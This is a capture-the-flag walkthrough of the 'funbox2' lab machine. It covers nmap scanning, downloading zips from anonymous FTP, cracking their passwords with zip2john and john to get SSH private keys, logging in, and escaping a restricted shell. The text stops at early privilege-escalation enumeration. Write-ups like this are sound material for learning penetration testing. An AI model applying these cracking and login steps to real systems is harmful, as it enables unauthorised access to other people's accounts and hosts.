Pwned Date - 27th Jun 2022

Enumeration

┌──(kali㉿VirtualBox)-[~]
└─$ nmap -sC -sV 192.168.201.107 -p 21,22,80

PORT   STATE SERVICE VERSION
21/tcp open  ftp     ProFTPD 1.3.5e
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-rw-r--   1 ftp      ftp          1477 Jul 25  2020 anna.zip
| -rw-rw-r--   1 ftp      ftp          1477 Jul 25  2020 ariel.zip
| -rw-rw-r--   1 ftp      ftp          1477 Jul 25  2020 bud.zip
| -rw-rw-r--   1 ftp      ftp          1477 Jul 25  2020 cathrine.zip
| -rw-rw-r--   1 ftp      ftp          1477 Jul 25  2020 homer.zip
| -rw-rw-r--   1 ftp      ftp          1477 Jul 25  2020 jessica.zip
| -rw-rw-r--   1 ftp      ftp          1477 Jul 25  2020 john.zip
| -rw-rw-r--   1 ftp      ftp          1477 Jul 25  2020 marge.zip
| -rw-rw-r--   1 ftp      ftp          1477 Jul 25  2020 miriam.zip
| -r--r--r--   1 ftp      ftp          1477 Jul 25  2020 tom.zip
| -rw-r--r--   1 ftp      ftp           170 Jan 10  2018 welcome.msg
|_-rw-rw-r--   1 ftp      ftp          1477 Jul 25  2020 zlatan.zip
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 f9:46:7d:fe:0c:4d:a9:7e:2d:77:74:0f:a2:51:72:51 (RSA)
|   256 15:00:46:67:80:9b:40:12:3a:0c:66:07:db:1d:18:47 (ECDSA)
|_  256 75:ba:66:95:bb:0f:16:de:7e:7e:a1:7b:27:3b:b0:58 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
| http-robots.txt: 1 disallowed entry 
|_/logs/
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Easy nmap right there, let’s get all the files from the ftp

┌──(kali㉿VirtualBox)-[~]
└─$ ftp 192.168.201.107 -p 21
Connected to 192.168.201.107.
220 ProFTPD 1.3.5e Server (Debian) [::ffff:192.168.201.107]
Name (192.168.201.107:kali): anonymous
331 Anonymous login ok, send your complete email address as your password
Password: 123

After downloading all the zip files, but it turns out they need password to unzip

Exploitation

Let’s try unzip one by one, we got tom and cathrine

┌──(kali㉿VirtualBox)-[~/ftp]
└─$ zip2john tom.zip > tom.hash

┌──(kali㉿VirtualBox)-[~/ftp]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt tom.hash 
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
iubire           (tom.zip/id_rsa)     
1g 0:00:00:00 DONE (2022-06-27 04:14) 50.00g/s 204800p/s 204800c/s 204800C/s 123456..oooooo
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

┌──(kali㉿VirtualBox)-[~/ftp]
└─$ zip2john cathrine.zip > cathrine.hash

┌──(kali㉿VirtualBox)-[~/ftp]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt cathrine.hash
Created directory: /home/kali/.john
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
catwoman         (cathrine.zip/id_rsa)     
1g 0:00:00:00 DONE (2022-06-27 04:19) 100.0g/s 409600p/s 409600c/s 409600C/s 123456..oooooo
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

After unzipping, chmod the id_rsa key to 400 so we can use it to ssh

┌──(kali㉿VirtualBox)-[~/ftp/tom_cat]
└─$ ll
total 16K
-rw-r--r-- 1 kali kali 1.5K Jul 25  2020 cathrine.zip
-rw------- 1 kali kali 1.7K Jul 25  2020 cat_id_rsa
-rw------- 1 kali kali 1.7K Jul 25  2020 tom_id_rsa
-rw-r--r-- 1 kali kali 1.5K Jul 25  2020 tom.zip
                                                                                         
┌──(kali㉿VirtualBox)-[~/ftp/tom_cat]
└─$ chmod 400 cat_id_rsa 
                                                                                         
┌──(kali㉿VirtualBox)-[~/ftp/tom_cat]
└─$ chmod 400 tom_id_rsa  

Seems like only tom user can successfully login to ssh

┌──(kali㉿VirtualBox)-[~/ftp]
└─$ ssh [email protected] -i cat_id_rsa
Connection closed by 192.168.201.107 port 22

┌──(kali㉿VirtualBox)-[~/ftp]
└─$ ssh [email protected] -i tom_id_rsa
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-117-generic x86_64)

 * Documentation:  <https://help.ubuntu.com>
 * Management:     <https://landscape.canonical.com>
 * Support:        <https://ubuntu.com/advantage>

  System information as of Mon Jun 27 08:24:15 UTC 2022

  System load:  0.04              Processes:             165
  Usage of /:   74.4% of 4.37GB   Users logged in:       0
  Memory usage: 37%               IP address for ens256: 192.168.201.107
  Swap usage:   0%

30 packages can be updated.
0 updates are security updates.

Failed to connect to <https://changelogs.ubuntu.com/meta-release-lts>. Check your Internet connection or proxy settings

Last login: Mon Jun 27 08:23:29 2022 from 192.168.49.201
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

tom@funbox2:~$ whoami
tom

tom@funbox2:~$ cat local.txt
eb085f25b13ee4c11e0284537012b007

Privilege Escalation

Ayo what the fuck, let’s use some other shell then

tom@funbox2:~$ cd ..
-rbash: cd: restricted

tom@funbox2:~$ bash
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

tom@funbox2:~$ cd ..
tom@funbox2:/home$ 

Seems like there is sql running

tom@funbox2:~$ netstat -tulpn | grep LISTEN
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -                   
tcp6       0      0 :::21                   :::*                    LISTEN      -                   
tcp6       0      0 :::22                   :::*                    LISTEN      -                   
tcp6       0      0 :::80                   :::*                    LISTEN      -